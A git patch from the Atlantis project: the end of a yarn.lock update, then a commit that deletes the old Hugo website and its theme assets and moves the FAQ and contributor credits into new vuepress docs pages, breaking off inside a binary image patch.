+workbox-background-sync@^3.3.0:
+  version "3.3.0"
+  resolved "https://registry.yarnpkg.com/workbox-background-sync/-/workbox-background-sync-3.3.0.tgz#87e212715391d2002274f526e77851cfab86ed8a"
+  dependencies:
+    workbox-core "^3.3.0"
+
+workbox-broadcast-cache-update@^3.3.0:
+  version "3.3.0"
+  resolved "https://registry.yarnpkg.com/workbox-broadcast-cache-update/-/workbox-broadcast-cache-update-3.3.0.tgz#ce4fa56656de5024f567c06f6614e36961c30c0f"
+  dependencies:
+    workbox-core "^3.3.0"
+
+workbox-build@^3.1.0:
+  version "3.3.0"
+  resolved "https://registry.yarnpkg.com/workbox-build/-/workbox-build-3.3.0.tgz#7f3fa9de9714dab318122933b9615a38d94d643d"
+  dependencies:
+    babel-runtime "^6.26.0"
+    common-tags "^1.4.0"
+    fs-extra "^4.0.2"
+    glob "^7.1.2"
+    joi "^11.1.1"
+    lodash.template "^4.4.0"
+    pretty-bytes "^4.0.2"
+    workbox-background-sync "^3.3.0"
+    workbox-broadcast-cache-update "^3.3.0"
+    workbox-cache-expiration "^3.3.0"
+    workbox-cacheable-response "^3.3.0"
+    workbox-core "^3.3.0"
+    workbox-google-analytics "^3.3.0"
+    workbox-precaching "^3.3.0"
+    workbox-range-requests "^3.3.0"
+    workbox-routing "^3.3.0"
+    workbox-strategies "^3.3.0"
+    workbox-streams "^3.3.0"
+    workbox-sw "^3.3.0"
+
+workbox-cache-expiration@^3.3.0:
+  version "3.3.0"
+  resolved "https://registry.yarnpkg.com/workbox-cache-expiration/-/workbox-cache-expiration-3.3.0.tgz#fe9cfde8e8168fa25ff778c6e2eda54181f58506"
+  dependencies:
+    workbox-core "^3.3.0"
+
+workbox-cacheable-response@^3.3.0:
+  version "3.3.0"
+  resolved "https://registry.yarnpkg.com/workbox-cacheable-response/-/workbox-cacheable-response-3.3.0.tgz#b7d3904fa30baf7da271d73dd2f0da7518378acf"
+  dependencies:
+    workbox-core "^3.3.0"
+
+workbox-core@^3.3.0:
+  version "3.3.0"
+  resolved "https://registry.yarnpkg.com/workbox-core/-/workbox-core-3.3.0.tgz#3606223514a85a0935550ed15d973c12b12ff680"
+
+workbox-google-analytics@^3.3.0:
+  version "3.3.0"
+  resolved "https://registry.yarnpkg.com/workbox-google-analytics/-/workbox-google-analytics-3.3.0.tgz#380ecefc24040db9e191b2789bced19ad61c8ccb"
+  dependencies:
+    workbox-background-sync "^3.3.0"
+    workbox-core "^3.3.0"
+    workbox-routing "^3.3.0"
+    workbox-strategies "^3.3.0"
+
+workbox-precaching@^3.3.0:
+  version "3.3.0"
+  resolved "https://registry.yarnpkg.com/workbox-precaching/-/workbox-precaching-3.3.0.tgz#471bbc26bd3e92b24fd9d636842cf3f358302bd2"
+  dependencies:
+    workbox-core "^3.3.0"
+
+workbox-range-requests@^3.3.0:
+  version "3.3.0"
+  resolved "https://registry.yarnpkg.com/workbox-range-requests/-/workbox-range-requests-3.3.0.tgz#9703cb91e9ea9104ed09c545a87e25f41002ddce"
+  dependencies:
+    workbox-core "^3.3.0"
+
+workbox-routing@^3.3.0:
+  version "3.3.0"
+  resolved "https://registry.yarnpkg.com/workbox-routing/-/workbox-routing-3.3.0.tgz#8184d0159c8c4e4c9dd7a0da08e28e579e372319"
+  dependencies:
+    workbox-core "^3.3.0"
+
+workbox-strategies@^3.3.0:
+  version "3.3.0"
+  resolved "https://registry.yarnpkg.com/workbox-strategies/-/workbox-strategies-3.3.0.tgz#0681df07ebf4628454aa91317aa87de2d1ded6c6"
+  dependencies:
+    workbox-core "^3.3.0"
+
+workbox-streams@^3.3.0:
+  version "3.3.0"
+  resolved "https://registry.yarnpkg.com/workbox-streams/-/workbox-streams-3.3.0.tgz#7591e37a08bf65b32d1db076b86900a8a4b7d02c"
+  dependencies:
+    workbox-core "^3.3.0"
+
+workbox-sw@^3.3.0:
+  version "3.3.0"
+  resolved "https://registry.yarnpkg.com/workbox-sw/-/workbox-sw-3.3.0.tgz#1a9fd728951c76b86225b472f9e37088913c9bc4"
+
+worker-farm@^1.5.2:
+  version "1.6.0"
+  resolved "https://registry.yarnpkg.com/worker-farm/-/worker-farm-1.6.0.tgz#aecc405976fab5a95526180846f0dba288f3a4a0"
+  dependencies:
+    errno "~0.1.7"
+
+wrap-ansi@^3.0.1:
+  version "3.0.1"
+  resolved "https://registry.yarnpkg.com/wrap-ansi/-/wrap-ansi-3.0.1.tgz#288a04d87eda5c286e060dfe8f135ce8d007f8ba"
+  dependencies:
+    string-width "^2.1.1"
+    strip-ansi "^4.0.0"
+
+wrappy@1:
+  version "1.0.2"
+  resolved "https://registry.yarnpkg.com/wrappy/-/wrappy-1.0.2.tgz#b5243d8f3ec1aa35f1364605bc0d1036e30ab69f"
+
+write-file-atomic@^2.0.0:
+  version "2.3.0"
+  resolved "https://registry.yarnpkg.com/write-file-atomic/-/write-file-atomic-2.3.0.tgz#1ff61575c2e2a4e8e510d6fa4e243cce183999ab"
+  dependencies:
+    graceful-fs "^4.1.11"
+    imurmurhash "^0.1.4"
+    signal-exit "^3.0.2"
+
+ws@^4.0.0:
+  version "4.1.0"
+  resolved "https://registry.yarnpkg.com/ws/-/ws-4.1.0.tgz#a979b5d7d4da68bf54efe0408967c324869a7289"
+  dependencies:
+    async-limiter "~1.0.0"
+    safe-buffer "~5.1.0"
+
+xdg-basedir@^3.0.0:
+  version "3.0.0"
+  resolved "https://registry.yarnpkg.com/xdg-basedir/-/xdg-basedir-3.0.0.tgz#496b2cc109eca8dbacfe2dc72b603c17c5870ad4"
+
+xtend@^4.0.0, xtend@~4.0.1:
+  version "4.0.1"
+  resolved "https://registry.yarnpkg.com/xtend/-/xtend-4.0.1.tgz#a5c6d532be656e23db820efb943a1f04998d63af"
+
+y18n@^4.0.0:
+  version "4.0.0"
+  resolved "https://registry.yarnpkg.com/y18n/-/y18n-4.0.0.tgz#95ef94f85ecc81d007c264e190a120f0a3c8566b"
+
+yallist@^2.1.2:
+  version "2.1.2"
+  resolved "https://registry.yarnpkg.com/yallist/-/yallist-2.1.2.tgz#1c11f9218f076089a47dd512f93c6699a6a81d52"
+
+yallist@^3.0.0, yallist@^3.0.2:
+  version "3.0.2"
+  resolved "https://registry.yarnpkg.com/yallist/-/yallist-3.0.2.tgz#8452b4bb7e83c7c188d8041c1a837c773d6d8bb9"
+
+yargs-parser@^10.0.0:
+  version "10.0.0"
+  resolved "https://registry.yarnpkg.com/yargs-parser/-/yargs-parser-10.0.0.tgz#c737c93de2567657750cb1f2c00be639fd19c994"
+  dependencies:
+    camelcase "^4.1.0"

From 860cdb866c22d50ae9574053b40ac77aabdf47c6 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Fri, 22 Jun 2018 17:27:15 +0100
Subject: [PATCH 46/69] Delete old website

---
 runatlantis.io/.vuepress/config.js            |    2 +
 runatlantis.io/docs/README.md                 |   48 -
 runatlantis.io/docs/contributing.md           |   21 +
 runatlantis.io/docs/faq.md                    |   28 +
 website/src/archetypes/default.md             |    6 -
 website/src/archetypes/docs.md                |    8 -
 website/src/config.toml                       |   22 -
 website/src/content/_index.md                 |    6 -
 website/src/static/.gitkeep                   |    0
 .../src/static/img/atlantis-highquality.png   |  Bin 21445 -> 0 bytes
 website/src/static/img/atlantis-logo.png      |  Bin 21445 -> 0 bytes
 website/src/static/img/collaborate.png        |  Bin 13549 -> 0 bytes
 website/src/static/img/demo-large.gif         |  Bin 4767847 -> 0 bytes
 website/src/static/img/demo.gif               |  Bin 1650880 -> 0 bytes
 website/src/static/img/locking.png            |  Bin 15521 -> 0 bytes
 website/src/static/img/logo-384x384.png       |  Bin 47594 -> 0 bytes
 .../static/img/no-need-to-distribute-keys.png |  Bin 8889 -> 0 bytes
 website/src/themes/kube/.gitignore            |    1 -
 website/src/themes/kube/LICENSE.md            |   20 -
 website/src/themes/kube/README.md             |  177 --
 website/src/themes/kube/archetypes/blog.md    |    6 -
 website/src/themes/kube/archetypes/docs.md    |    8 -
 website/src/themes/kube/layouts/404.html      |   12 -
 .../themes/kube/layouts/_default/baseof.html  |   68 -
 .../themes/kube/layouts/_default/list.html    |   18 -
 .../themes/kube/layouts/_default/single.html  |   18 -
 .../src/themes/kube/layouts/blog/single.html  |   58 -
 .../src/themes/kube/layouts/docs/single.html  |   23 -
 website/src/themes/kube/layouts/index.html    |   46 -
 .../themes/kube/layouts/partials/favicon.html |    1 -
 .../themes/kube/layouts/partials/footer.html  |   26 -
 .../themes/kube/layouts/partials/header.html  |   27 -
 .../layouts/partials/meta/name-author.html    |    6 -
 .../kube/layouts/partials/meta/ogimage.html   |    8 -
 .../kube/layouts/partials/page-summary.html   |    9 -
 .../kube/layouts/partials/pagination.html     |   15 -
 .../kube/layouts/partials/post/byauthor.html  |   20 -
 .../layouts/partials/post/category-link.html  |    1 -
 .../kube/layouts/partials/post/meta.html      |   14 -
 .../partials/post/related-content.html        |   16 -
 .../kube/layouts/partials/post/tag-link.html  |    1 -
 .../layouts/partials/scripts/animation.html   |  127 -
 .../layouts/partials/site-verification.html   |   12 -
 .../src/themes/kube/layouts/partials/toc.html |   21 -
 .../src/themes/kube/layouts/section/docs.html |   22 -
 .../src/themes/kube/layouts/section/faq.html  |   16 -
 website/src/themes/kube/static/css/custom.css |    6 -
 website/src/themes/kube/static/css/font.css   |   68 -
 .../src/themes/kube/static/css/highlight.css  |    1 -
 website/src/themes/kube/static/css/kube.css   | 2156 ----------------
 .../src/themes/kube/static/css/kube.demo.css  |  404 ---
 .../themes/kube/static/css/kube.legenda.css   |  406 ---
 .../src/themes/kube/static/css/kube.min.css   |    1 -
 website/src/themes/kube/static/css/master.css | 1132 ---------
 .../themes/kube/static/font/Lato-Black.woff   |  Bin 297272 -> 0 bytes
 .../themes/kube/static/font/Lato-Bold.woff    |  Bin 328952 -> 0 bytes
 .../kube/static/font/Lato-BoldItalic.woff     |  Bin 347092 -> 0 bytes
 .../themes/kube/static/font/Lato-Italic.woff  |  Bin 343528 -> 0 bytes
 .../themes/kube/static/font/Lato-Regular.woff |  Bin 323172 -> 0 bytes
 .../kube/static/font/Lato-Semibold.woff       |  Bin 326132 -> 0 bytes
 .../kube/static/img/common/icon-twitter.png   |  Bin 8496 -> 0 bytes
 .../themes/kube/static/img/common/logo.png    |  Bin 1462 -> 0 bytes
 .../themes/kube/static/img/common/logx2.png   |  Bin 2384 -> 0 bytes
 .../kube/static/img/icon-minimalism.png       |  Bin 1753 -> 0 bytes
 .../src/themes/kube/static/img/icon-typo.png  |  Bin 1133 -> 0 bytes
 .../src/themes/kube/static/img/kube/brand.png |  Bin 1848 -> 0 bytes
 .../kube/static/img/kube/icon-baseline.png    |  Bin 1024 -> 0 bytes
 .../kube/static/img/kube/icon-minimalism.png  |  Bin 1753 -> 0 bytes
 .../themes/kube/static/img/kube/icon-typo.png |  Bin 1133 -> 0 bytes
 .../kube/static/img/kube/typography/01.png    |  Bin 44318 -> 0 bytes
 .../kube/static/img/kube/typography/02.png    |  Bin 6913 -> 0 bytes
 .../themes/kube/static/js/jquery-2.1.4.min.js |    5 -
 website/src/themes/kube/static/js/kube.js     | 2201 -----------------
 .../src/themes/kube/static/js/kube.legenda.js |    0
 website/src/themes/kube/static/js/kube.min.js |    1 -
 website/src/themes/kube/static/js/master.js   |    0
 .../src/themes/kube/static/js/tocbot.min.js   |   18 -
 website/src/themes/kube/theme.toml            |   31 -
 78 files changed, 51 insertions(+), 7317 deletions(-)
 create mode 100644 runatlantis.io/docs/contributing.md
 create mode 100644 runatlantis.io/docs/faq.md
 delete mode 100644 website/src/archetypes/default.md
 delete mode 100644 website/src/archetypes/docs.md
 delete mode 100644 website/src/config.toml
 delete mode 100644 website/src/content/_index.md
 delete mode 100644 website/src/static/.gitkeep
 delete mode 100644 website/src/static/img/atlantis-highquality.png
 delete mode 100644 website/src/static/img/atlantis-logo.png
 delete mode 100644 website/src/static/img/collaborate.png
 delete mode 100644 website/src/static/img/demo-large.gif
 delete mode 100644 website/src/static/img/demo.gif
 delete mode 100644 website/src/static/img/locking.png
 delete mode 100644 website/src/static/img/logo-384x384.png
 delete mode 100644 website/src/static/img/no-need-to-distribute-keys.png
 delete mode 100644 website/src/themes/kube/.gitignore
 delete mode 100644 website/src/themes/kube/LICENSE.md
 delete mode 100644 website/src/themes/kube/README.md
 delete mode 100644 website/src/themes/kube/archetypes/blog.md
 delete mode 100644 website/src/themes/kube/archetypes/docs.md
 delete mode 100644 website/src/themes/kube/layouts/404.html
 delete mode 100644 website/src/themes/kube/layouts/_default/baseof.html
 delete mode 100644 website/src/themes/kube/layouts/_default/list.html
 delete mode 100644 website/src/themes/kube/layouts/_default/single.html
 delete mode 100644 website/src/themes/kube/layouts/blog/single.html
 delete mode 100644 website/src/themes/kube/layouts/docs/single.html
 delete mode 100644 website/src/themes/kube/layouts/index.html
 delete mode 100644 website/src/themes/kube/layouts/partials/favicon.html
 delete mode 100644 website/src/themes/kube/layouts/partials/footer.html
 delete mode 100644 website/src/themes/kube/layouts/partials/header.html
 delete mode 100644 website/src/themes/kube/layouts/partials/meta/name-author.html
 delete mode 100644 website/src/themes/kube/layouts/partials/meta/ogimage.html
 delete mode 100644 website/src/themes/kube/layouts/partials/page-summary.html
 delete mode 100644 website/src/themes/kube/layouts/partials/pagination.html
 delete mode 100644 website/src/themes/kube/layouts/partials/post/byauthor.html
 delete mode 100644 website/src/themes/kube/layouts/partials/post/category-link.html
 delete mode 100644 website/src/themes/kube/layouts/partials/post/meta.html
 delete mode 100644 website/src/themes/kube/layouts/partials/post/related-content.html
 delete mode 100644 website/src/themes/kube/layouts/partials/post/tag-link.html
 delete mode 100644 website/src/themes/kube/layouts/partials/scripts/animation.html
 delete mode 100644 website/src/themes/kube/layouts/partials/site-verification.html
 delete mode 100644 website/src/themes/kube/layouts/partials/toc.html
 delete mode 100644 website/src/themes/kube/layouts/section/docs.html
 delete mode 100644 website/src/themes/kube/layouts/section/faq.html
 delete mode 100644 website/src/themes/kube/static/css/custom.css
 delete mode 100644 website/src/themes/kube/static/css/font.css
 delete mode 100644 website/src/themes/kube/static/css/highlight.css
 delete mode 100644 website/src/themes/kube/static/css/kube.css
 delete mode 100644 website/src/themes/kube/static/css/kube.demo.css
 delete mode 100644 website/src/themes/kube/static/css/kube.legenda.css
 delete mode 100644 website/src/themes/kube/static/css/kube.min.css
 delete mode 100644 website/src/themes/kube/static/css/master.css
 delete mode 100644 website/src/themes/kube/static/font/Lato-Black.woff
 delete mode 100644 website/src/themes/kube/static/font/Lato-Bold.woff
 delete mode 100644 website/src/themes/kube/static/font/Lato-BoldItalic.woff
 delete mode 100644 website/src/themes/kube/static/font/Lato-Italic.woff
 delete mode 100644 website/src/themes/kube/static/font/Lato-Regular.woff
 delete mode 100644 website/src/themes/kube/static/font/Lato-Semibold.woff
 delete mode 100644 website/src/themes/kube/static/img/common/icon-twitter.png
 delete mode 100644 website/src/themes/kube/static/img/common/logo.png
 delete mode 100644 website/src/themes/kube/static/img/common/logx2.png
 delete mode 100644 website/src/themes/kube/static/img/icon-minimalism.png
 delete mode 100644 website/src/themes/kube/static/img/icon-typo.png
 delete mode 100644 website/src/themes/kube/static/img/kube/brand.png
 delete mode 100644 website/src/themes/kube/static/img/kube/icon-baseline.png
 delete mode 100644 website/src/themes/kube/static/img/kube/icon-minimalism.png
 delete mode 100644 website/src/themes/kube/static/img/kube/icon-typo.png
 delete mode 100644 website/src/themes/kube/static/img/kube/typography/01.png
 delete mode 100644 website/src/themes/kube/static/img/kube/typography/02.png
 delete mode 100644 website/src/themes/kube/static/js/jquery-2.1.4.min.js
 delete mode 100644 website/src/themes/kube/static/js/kube.js
 delete mode 100644 website/src/themes/kube/static/js/kube.legenda.js
 delete mode 100644 website/src/themes/kube/static/js/kube.min.js
 delete mode 100644 website/src/themes/kube/static/js/master.js
 delete mode 100644 website/src/themes/kube/static/js/tocbot.min.js
 delete mode 100644 website/src/themes/kube/theme.toml

diff --git a/runatlantis.io/.vuepress/config.js b/runatlantis.io/.vuepress/config.js
index 9e2f6a54ed..1b6bd0f4ae 100644
--- a/runatlantis.io/.vuepress/config.js
+++ b/runatlantis.io/.vuepress/config.js
@@ -33,6 +33,8 @@ module.exports = {
             '/docs/',
             '/docs/pull-request-commands',
             '/docs/deployment',
+            '/docs/faq',
+            '/docs/contributing',
         ],
         repo: 'runatlantis/atlantis',
         docsDir: 'runatlantis.io',
diff --git a/runatlantis.io/docs/README.md b/runatlantis.io/docs/README.md
index ad31df63e6..0762964107 100644
--- a/runatlantis.io/docs/README.md
+++ b/runatlantis.io/docs/README.md
@@ -352,54 +352,6 @@ We identify a project by its repo **and** the path to the root of the project wi
 #### Workspace/Environment
 A Terraform workspace. See [terraform docs](https://www.terraform.io/docs/state/workspaces.html) for more information.
 
-## FAQ
-**Q: Does Atlantis affect Terraform [remote state](https://www.terraform.io/docs/state/remote.html)?**
 
-A: No. Atlantis does not interfere with Terraform remote state in any way. Under the hood, Atlantis is simply executing `terraform plan` and `terraform apply`.
 
-**Q: How does Atlantis locking interact with Terraform [locking](https://www.terraform.io/docs/state/locking.html)?**
-
-A: Atlantis provides locking of pull requests that prevents concurrent modification of the same infrastructure (Terraform project) whereas Terraform locking only prevents two concurrent `terraform apply`'s from happening.
-
-Terraform locking can be used alongside Atlantis locking since Atlantis is simply executing terraform commands.
-
-**Q: How to run Atlantis in high availability mode? Does it need to be?**
-
-A: Atlantis server can easily be run under the supervision of a init system like `upstart` or `systemd` to make sure `atlantis server` is always running.
-
-Atlantis currently stores all locking and Terraform plans locally on disk under the `--data-dir` directory (defaults to `~/.atlantis`). Because of this there is currently no way to run two or more Atlantis instances concurrently.
-
-However, if you were to lose the data, all you would need to do is run `atlantis plan` again on the pull requests that are open. If someone tries to run `atlantis apply` after the data has been lost then they will get an error back, so they will have to re-plan anyway.
-
-**Q: How to add SSL to Atlantis server?**
-
-A: First, you'll need to get a public/private key pair to serve over SSL.
-These need to be in a directory accessible by Atlantis. Then start `atlantis server` with the `--ssl-cert-file` and `--ssl-key-file` flags.
-See `atlantis server --help` for more information.
-
-**Q: How can I get Atlantis up and running on AWS?**
-
-A: There is [terraform-aws-atlantis](https://github.com/terraform-aws-modules/terraform-aws-atlantis) project where complete Terraform configurations for running Atlantis on AWS Fargate are hosted. Tested and maintained.
-
-## Contributing
-Want to contribute? Check out [CONTRIBUTING](https://github.com/runatlantis/atlantis/blob/master/CONTRIBUTING.md).
-
-## Credits
-Atlantis was originally developed at [Hootsuite](https://hootsuite.com) under [hootsuite/atlantis](https://github.com/hootsuite/atlantis). The maintainers are indebted to Hootsuite for supporting the creation and continued development of this project over the last 2 years. The Hootsuite values of building a better way and teamwork made this project possible, alongside constant encouragement and assistance from our colleagues.
-
-NOTE: We had to remove the "fork" label because otherwise code searches don't work.
-
-Thank you to these awesome contributors!
-- [@nicholas-wu-hs](https://github.com/nicholas-wu-hs)
-- [@nadavshatz](https://github.com/nadavshatz)
-- [@jwieringa](https://github.com/jwieringa)
-- [@suhussai](https://github.com/suhussai)
-- [@mootpt](https://github.com/mootpt)
-- [@codec](https://github.com/codec)
-- [@nick-hollingsworth-hs](https://github.com/nick-hollingsworth-hs)
-- [@mpmsimo](https://github.com/mpmsimo)
-- [@hussfelt](https://github.com/hussfelt)
-- [@psalaberria002](https://github.com/psalaberria002)
-
-* Atlantis Logo: Icon made by [freepik](https://www.flaticon.com/authors/freepik) from www.flaticon.com
 
diff --git a/runatlantis.io/docs/contributing.md b/runatlantis.io/docs/contributing.md
new file mode 100644
index 0000000000..072886000c
--- /dev/null
+++ b/runatlantis.io/docs/contributing.md
@@ -0,0 +1,21 @@
+# Contributing
+Want to contribute? Check out [CONTRIBUTING](https://github.com/runatlantis/atlantis/blob/master/CONTRIBUTING.md).
+
+## Credits
+Atlantis was originally developed at [Hootsuite](https://hootsuite.com) under [hootsuite/atlantis](https://github.com/hootsuite/atlantis). The maintainers are indebted to Hootsuite for supporting the creation and continued development of this project over the last 2 years. The Hootsuite values of building a better way and teamwork made this project possible, alongside constant encouragement and assistance from our colleagues.
+
+NOTE: We had to remove the "fork" label because otherwise code searches don't work.
+
+Thank you to these awesome contributors!
+- [@nicholas-wu-hs](https://github.com/nicholas-wu-hs)
+- [@nadavshatz](https://github.com/nadavshatz)
+- [@jwieringa](https://github.com/jwieringa)
+- [@suhussai](https://github.com/suhussai)
+- [@mootpt](https://github.com/mootpt)
+- [@codec](https://github.com/codec)
+- [@nick-hollingsworth-hs](https://github.com/nick-hollingsworth-hs)
+- [@mpmsimo](https://github.com/mpmsimo)
+- [@hussfelt](https://github.com/hussfelt)
+- [@psalaberria002](https://github.com/psalaberria002)
+
+* Atlantis Logo: Icon made by [freepik](https://www.flaticon.com/authors/freepik) from www.flaticon.com
diff --git a/runatlantis.io/docs/faq.md b/runatlantis.io/docs/faq.md
new file mode 100644
index 0000000000..379bd74e99
--- /dev/null
+++ b/runatlantis.io/docs/faq.md
@@ -0,0 +1,28 @@
+# FAQ
+**Q: Does Atlantis affect Terraform [remote state](https://www.terraform.io/docs/state/remote.html)?**
+
+A: No. Atlantis does not interfere with Terraform remote state in any way. Under the hood, Atlantis is simply executing `terraform plan` and `terraform apply`.
+
+**Q: How does Atlantis locking interact with Terraform [locking](https://www.terraform.io/docs/state/locking.html)?**
+
+A: Atlantis provides locking of pull requests that prevents concurrent modification of the same infrastructure (Terraform project) whereas Terraform locking only prevents two concurrent `terraform apply`'s from happening.
+
+Terraform locking can be used alongside Atlantis locking since Atlantis is simply executing terraform commands.
+
+**Q: How to run Atlantis in high availability mode? Does it need to be?**
+
+A: Atlantis server can easily be run under the supervision of a init system like `upstart` or `systemd` to make sure `atlantis server` is always running.
+
+Atlantis currently stores all locking and Terraform plans locally on disk under the `--data-dir` directory (defaults to `~/.atlantis`). Because of this there is currently no way to run two or more Atlantis instances concurrently.
+
+However, if you were to lose the data, all you would need to do is run `atlantis plan` again on the pull requests that are open. If someone tries to run `atlantis apply` after the data has been lost then they will get an error back, so they will have to re-plan anyway.
+
+**Q: How to add SSL to Atlantis server?**
+
+A: First, you'll need to get a public/private key pair to serve over SSL.
+These need to be in a directory accessible by Atlantis. Then start `atlantis server` with the `--ssl-cert-file` and `--ssl-key-file` flags.
+See `atlantis server --help` for more information.
+
+**Q: How can I get Atlantis up and running on AWS?**
+
+A: There is [terraform-aws-atlantis](https://github.com/terraform-aws-modules/terraform-aws-atlantis) project where complete Terraform configurations for running Atlantis on AWS Fargate are hosted. Tested and maintained.
\ No newline at end of file
diff --git a/website/src/archetypes/default.md b/website/src/archetypes/default.md
deleted file mode 100644
index f5a9e450ff..0000000000
--- a/website/src/archetypes/default.md
+++ /dev/null
@@ -1,6 +0,0 @@
----
-title: "{{ replace .TranslationBaseName "-" " " | title }}"
-date: {{ .Date }}
-draft: true
----
-
diff --git a/website/src/archetypes/docs.md b/website/src/archetypes/docs.md
deleted file mode 100644
index fa23e66f29..0000000000
--- a/website/src/archetypes/docs.md
+++ /dev/null
@@ -1,8 +0,0 @@
-+++
-title = ""
-description = ""
-weight = 20
-draft = false
-bref = ""
-toc = true
-+++
diff --git a/website/src/config.toml b/website/src/config.toml
deleted file mode 100644
index 7a7e264100..0000000000
--- a/website/src/config.toml
+++ /dev/null
@@ -1,22 +0,0 @@
-baseURL = "https://www.runatlantis.io"
-languageCode = "en-us"
-title = "Atlantis - A unified workflow for collaborating on Terraform through GitHub and GitLab"
-theme = "kube"
-description = "A unified workflow for collaborating on Terraform through GitHub and GitLab"
-Paginate = 4
-[[menu.main]]
-    name = "Docs"
-    weight = -100
-    url = "https://github.com/runatlantis/atlantis#getting-started"
-[[menu.main]]
-    name = "Blog"
-    weight = -100
-    url = "https://medium.com/runatlantis"
-[[menu.main]]
-    name = "FAQ"
-    weight = -100
-    url = "https://github.com/runatlantis/atlantis#faq"
-[[menu.main]]
-    name = "Demo"
-    weight = 100
-    url = "https://www.youtube.com/watch?v=TmIPWda0IKg"
diff --git a/website/src/content/_index.md b/website/src/content/_index.md
deleted file mode 100644
index 796172245b..0000000000
--- a/website/src/content/_index.md
+++ /dev/null
@@ -1,6 +0,0 @@
-+++
-description = "A unified workflow for collaborating on Terraform through GitHub and GitLab"
-title = "Atlantis"
-draft = false
-
-+++
diff --git a/website/src/static/.gitkeep b/website/src/static/.gitkeep
deleted file mode 100644
index e69de29bb2..0000000000
diff --git a/website/src/static/img/atlantis-highquality.png b/website/src/static/img/atlantis-highquality.png
deleted file mode 100644
index 4fab9dd9627234e028fc354369562e2081f28960..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 21445
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
